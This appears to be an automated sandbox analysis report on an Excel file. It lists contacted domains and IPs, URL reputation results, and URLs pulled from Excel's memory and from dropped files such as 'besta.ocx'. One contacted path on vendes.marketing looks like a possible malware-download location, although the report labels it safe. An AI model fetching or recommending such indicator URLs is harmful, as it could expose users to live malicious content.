    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://vendes.marketing/wp-content/uploads/2021/10/framer.svg0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/conversion-rate-optimizati0%Avira URL Cloudsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-300x102.png0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/anuncios-300x270.png0%Avira URL Cloudsafe
    https://settings.outlook.comS0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/visual-Studio.svg0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/publicidad-digi0%Avira URL Cloudsafe
    https://standoutglobal.com/0%Avira URL Cloudsafe
    http://vendes.marketing/transmigrant/Wplzr/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-magento/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://vendes.marketing/wp-content/uploads/2021/10/figma.svg0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.0.20%Avira URL Cloudsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-en-marketing-basado-e0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/elementor/css/post-2157.css?ver=16382122820%Avira URL Cloudsafe
    https://vendes.marketing/wp-includes/css/dist/block-library/style.min.css?ver=5.8.20%Avira URL Cloudsafe
    https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2F0%Avira URL Cloudsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://vendes.marketing/wp-content/uploads/2021/10/elementor.svg0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/ie.css?ver=1.40%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/images/caso-exito1.png0%Avira URL Cloudsafe
    https://outlook.office.comSharepointFilesHostFormat0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://onedrive.live.comed0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/produccion-audiovisual/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/anuncios.png0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/elementor/css/post-2017.css?ver=16382122820%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/0%Avira URL Cloudsafe
    http://schemas.micro0%URL Reputationsafe
    https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-inmobiliarias-cons0%Avira URL Cloudsafe
    https://vendes.marketing/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.20%Avira URL Cloudsafe
    https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionsmU0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.c0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src0%Avira URL Cloudsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1024x348.png0%Avira URL Cloudsafe
    https://api.cortana.ai0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    standoutglobal.com
    		162.240.9.126
    		truefalse
      		unknown
      vendes.marketing
      		107.180.46.229
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://vendes.marketing/transmigrant/Wplzr/false
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://vendes.marketing/wp-content/uploads/2021/10/framer.svgbesta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://login.windows-ppe.net/common/oauth2/authorize?EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
          		high
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
            		high
            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
              		high
              https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/conversion-rate-optimizatibesta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://visio.uservoice.com/forums/368202-visio-on-devicesUserVoiceWordIOShttps://word.uservoice.comEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                		high
                https://rpsticket.partnerservices.getmicrosoftkey.comEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                • URL Reputation: safe
                		unknown
                https://lookup.onenote.com/lookup/geolocation/v172CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                  		high
                  https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-300x102.pngEXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://vendes.marketing/wp-content/uploads/2021/10/anuncios-300x270.pngbesta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                    		high
                    https://settings.outlook.comSEXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                      		high
                      https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                        		high
                        https://vendes.marketing/wp-content/uploads/2021/10/visual-Studio.svgbesta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/publicidad-digiBX1IWYL9.htm.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://standoutglobal.com/EXCEL.EXE, 00000001.00000003.421637044.0000000015A61000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://s.w.org/images/core/emoji/13.1.0/svg/1f609.svgEXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                          		high
                          https://res.getmicrosoftkey.com/api/redemptioneventsEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-magento/besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://tasks.office.comEXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                            		high
                            https://login.windows.net/common/oauth2/authorize#EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                              		high
                              http://purl.oclc.org/ooxml/drawingml/tabletEXCEL.EXE, 00000001.00000002.577171036.000000000D950000.00000004.00000001.sdmpfalse
                                		high
                                https://login.windows.net/common/oauth2/authorize%EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                  		high
                                  https://store.office.cn/addinstemplateEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://login.windows.net/common/oauth2/authorize&EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                    		high
                                    https://vendes.marketing/wp-content/uploads/2021/10/figma.svgbesta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://onedrive.live.com/embed?iEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                      		high
                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                        		high
                                        https://vendes.marketing/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.0.2EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.odwebp.svc.ms72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-en-marketing-basado-ebesta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://graph.windows.netEXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                          		high
                                          https://vendes.marketing/wp-content/uploads/elementor/css/post-2157.css?ver=1638212282EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesvUEXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmpfalse
                                            		high
                                            https://vendes.marketing/wp-includes/css/dist/block-library/style.min.css?ver=5.8.2besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                              		high
                                              https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2FEXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ncus.contentsync.EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://vendes.marketing/wp-content/uploads/2021/10/elementor.svgbesta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/ie.css?ver=1.4besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                		high
                                                http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                  		high
                                                  https://vendes.marketing/wp-content/uploads/images/caso-exito1.pngEXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                    		high
                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                      		high
                                                      https://outlook.office.comSharepointFilesHostFormatEXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2AzurEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://login.windows.net/common/oauth2/authorizebEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://login.windows.net/common/oauth2/authorizecEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://wus2.contentsync.EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://login.windows.net/common/oauth2/authorizedEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://login.windows.net/common/oauth2/authorizeeEXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://onedrive.live.comedEXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://login.windows.net/common/oauth2/authorizefEXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/produccion-audiovisual/BX1IWYL9.htm.1.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                    		high
                                                                    https://vendes.marketing/wp-content/uploads/2021/10/anuncios.pngBX1IWYL9.htm.1.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                      		high
                                                                      https://login.windows.net/common/oauth2/authorizePEXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://vendes.marketing/wp-content/uploads/elementor/css/post-2017.css?ver=1638212282EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://login.windows.net/common/oauth2/authorizeQEXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://clients.config.office.net/user/v1.0/android/policies72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                            		high
                                                                            https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://login.windows.net/common/oauth2/authorizeUEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oauEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://login.windows.net/common/oauth2/authorizeVEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://login.windows.net/common/oauth2/authorizeWEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.microEXCEL.EXE, 00000001.00000003.280878153.0000000013072000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.280700035.0000000013072000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                                      		high
                                                                                      https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-inmobiliarias-consbesta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://vendes.marketing/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://login.windows.net/common/oauth2/authorizeOEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://login.windows.net/common/oauth2/authorizeCEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionsmUEXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://login.windows.net/common/oauth2/authorizeDEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://substrate.office.com/search/api/v1/SearchHistoryEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                                              		high
                                                                                              https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.cEXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://login.windows.net/common/oauth2/authorizeEEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://login.windows.net/common/oauth2/authorizeFEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://login.windows.net/common/oauth2/authorizeGEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://login.windows.net/common/oauth2/authorize=EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://login.windows.net/common/oauth2/authorize?EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://login.windows.net/common/oauth2/authorize0EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                          		high
